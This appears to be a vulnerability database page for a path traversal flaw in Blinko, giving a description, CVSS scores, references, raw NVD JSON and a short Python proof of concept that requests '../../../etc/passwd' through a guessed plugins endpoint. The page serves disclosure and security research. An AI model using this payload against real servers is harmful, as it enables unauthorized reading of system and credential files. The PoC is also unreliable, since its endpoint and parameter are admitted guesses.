CVE-2026-23483

Description

Blinko is an AI-powered card note-taking project. In versions from 1.8.3 and prior, the plugin file server endpoint uses join() to concatenate paths but does not verify if the final path is within the plugins directory, leading to path traversal. At time of publication, there are no publicly available patches.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:* - VULNERABLE

Blinko <= 1.8.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-23483 Path Traversal in Blinko
import requests

def check_poc(target_url):
    # The endpoint usually handles plugin files, assuming it takes a 'path' parameter
    # Constructing a payload to traverse to /etc/passwd
    traversal_payload = "../../../etc/passwd"
    
    # Sending the malicious request
    # Note: The actual endpoint parameter name might differ (e.g., 'file', 'path')
    full_url = f"{target_url}/plugins?path={traversal_payload}"
    
    try:
        response = requests.get(full_url, timeout=10)
        if response.status_code == 200 and "root:" in response.text:
            return True, "Vulnerability confirmed, file content leaked."
        else:
            return False, "Target does not appear vulnerable or payload failed."
    except Exception as e:
        return False, str(e)

# Usage
# target = "http://127.0.0.1:port"
# print(check_poc(target))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23483
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23483
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23483/
[4] VulDB https://vuldb.com/cve/CVE-2026-23483
[5] https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23483", "sourceIdentifier": "[email protected]", "published": "2026-03-23T21:17:02.547", "lastModified": "2026-03-24T18:46:30.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blinko is an AI-powered card note-taking project. In versions from 1.8.3 and prior, the plugin file server endpoint uses join() to concatenate paths but does not verify if the final path is within the plugins directory, leading to path traversal. At time of publication, there are no publicly available patches."}, {"lang": "es", "value": "Blinko es un proyecto de toma de notas en tarjetas impulsado por IA. En las versiones 1.8.3 y anteriores, el endpoint del servidor de archivos del plugin utiliza join() para concatenar rutas pero no verifica si la ruta final está dentro del directorio de plugins, lo que lleva a un salto de ruta. En el momento de la publicación, no hay parches disponibles públicamente."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.3", "matchCriteriaId": "E1A18F1C-9DE3-41C2-8E99-49F0063FD24C"}]}]}], "references": [{"url": "https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}